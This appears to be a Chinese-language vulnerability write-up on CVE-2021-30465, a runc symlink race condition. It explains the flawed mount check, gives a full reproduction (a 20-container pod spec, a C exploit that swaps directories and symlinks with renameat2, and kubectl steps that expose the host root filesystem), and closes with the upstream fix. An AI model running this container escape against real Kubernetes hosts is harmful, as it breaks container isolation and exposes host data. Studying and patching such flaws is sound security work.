漏洞分析
CVE-2021-30465是一个runc漏洞,利用这个漏洞可以通过条件竞争攻击来将宿主的目录挂载到容器中。
在容器中挂载volume之前,runc会先调用SecureJoin()来检查路径并拼接到容器的根目录下,如果路径是一个符号链接,则会替换成该符号链接指向的对应路径[1.1]。
case "tmpfs": copyUp := m.Extensions&configs.EXT_COPYUP == configs.EXT_COPYUP tmpDir := "" // dest might be an absolute symlink, so it needs // to be resolved under rootfs. dest, err := securejoin.SecureJoin(rootfs, m.Destination) if err != nil { return err } m.Destination = dest stat, err := os.Stat(dest) if err != nil { if err := os.MkdirAll(dest, 0755); err != nil { return err } } ...... if copyUp { if err := fileutils.CopyDirectory(dest, tmpDir); err != nil { errMsg := fmt.Errorf("tmpcopyup: failed to copy %s to %s: %v", dest, tmpDir, err) if err1 := unix.Unmount(tmpDir, unix.MNT_DETACH); err1 != nil { return newSystemErrorWithCausef(err1, "tmpcopyup: %v: failed to unmount", errMsg) } return errMsg } if err := unix.Mount(tmpDir, dest, "", unix.MS_MOVE, ""); err != nil { errMsg := fmt.Errorf("tmpcopyup: failed to move mount %s to %s: %v", tmpDir, dest, err) if err1 := unix.Unmount(tmpDir, unix.MNT_DETACH); err1 != nil { return newSystemErrorWithCausef(err1, "tmpcopyup: %v: failed to unmount", errMsg) } return errMsg } }
通过条件竞争的方式,可以在路径检查和挂载操作之间将正常路径替换为符号链接。在检查阶段,路径还不是符号链接,所以不会经过处理;而在检查之后、挂载之前,将路径替换为符号链接,这样这个符号链接指向的宿主系统的路径就会被挂载到容器中。
漏洞复现
系统:Ubuntu 20.04
Kubernetes:1.21.0
containerd:1.4.4
创建一个包含多个容器的pod,我这里包含了20个,配置文件内容如下:
apiVersion: v1 kind: Pod metadata: name: pod1 spec: terminationGracePeriodSeconds: 1 containers: - name: c1 image: ubuntu:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test2 - name: c2 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c3 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c4 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c5 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c6 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c7 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c8 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c9 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c10 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c11 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c12 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c13 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c14 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c15 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c16 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c17 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c18 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c19 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz - name: c20 image: abc.cba/aaa:latest command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test1/mnt1 - name: test2 mountPath: /test1/mnt2 - name: test2 mountPath: /test1/mnt3 - name: test2 mountPath: /test1/mnt4 - name: test2 mountPath: /test1/zzz volumes: - name: test1 emptyDir: medium: "Memory" - name: test2 emptyDir: medium: "Memory"
可以看到除了第一个容器以外,其他容器的镜像都是无效的,每个容器都挂载了一个test1卷和5个test2卷。
获取创建好的pod的UID:
sudo kubectl get pod pod1 -o yaml | grep uid
编写exp,其中的24a602eb-62e2-47dd-a083-9f44489582d6为刚刚获取的UID:
#define _GNU_SOURCE #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <sys/syscall.h> #include <sys/wait.h> int main(int argc, char *argv[]) { char *name_mnts[] = {"mnt1", "mnt2", "mnt3", "mnt4"}; char *name_tmps[] = {"mnt-tmp1", "mnt-tmp2", "mnt-tmp3", "mnt-tmp4"}; char *ld = "/var/lib/kubelet/pods/24a602eb-62e2-47dd-a083-9f44489582d6/volumes/kubernetes.io~empty-dir/"; int dirfd = open(".", O_DIRECTORY|O_CLOEXEC); pid_t pid; int i; for (i=0; i<4; ++i) { pid = fork(); if (pid == 0) break; } if (pid != 0) wait(NULL); else { mkdir(name_mnts[i], 0755); symlink(ld, name_tmps[i]); while (1) renameat2(dirfd, name_mnts[i], dirfd, name_tmps[i], RENAME_EXCHANGE); } return 0; }
将编译好的exp文件放到c1容器中的/test1目录下,然后创建一个符号链接:
ln -s / /test2/test2
接着cd到/test1目录,运行exp。exp开始运行之后,回到宿主,更新其他容器的镜像使它们启动:
for c in {2..20}; do sudo kubectl set image pod pod1 c$c=ubuntu:latest done
列出每个容器的/test1/zzz目录下的内容:
for c in {2..20}; do echo c$c sudo kubectl exec -it pod/pod1 -c c$c -- ls /test1/zzz done
在上面的输出结果中,可以看到c20成功获取到了宿主根目录的内容。
官方修复
在挂载之前,runc会先检查路径在/proc中对应的fd,确保fd指向的路径和挂载的路径一致,从而避免符号链接[3.1]。
fh, err := os.OpenFile(path, unix.O_PATH|unix.O_CLOEXEC, 0) if err != nil { return fmt.Errorf("open o_path procfd: %w", err) } defer fh.Close() // Double-check the path is the one we expected. procfd := "/proc/self/fd/" + strconv.Itoa(int(fh.Fd())) if realpath, err := os.Readlink(procfd); err != nil { return fmt.Errorf("procfd verification failed: %w", err) } else if realpath != path { return fmt.Errorf("possibly malicious path detected -- refusing to operate on %s", realpath) }
参考
[1.1] https://github.com/opencontainers/runc/blob/v1.0.0-rc93/libcontainer/rootfs_linux.go#L340
[2.1] https://blog.champtar.fr/runc-symlink-CVE-2021-30465/
[3.1] https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f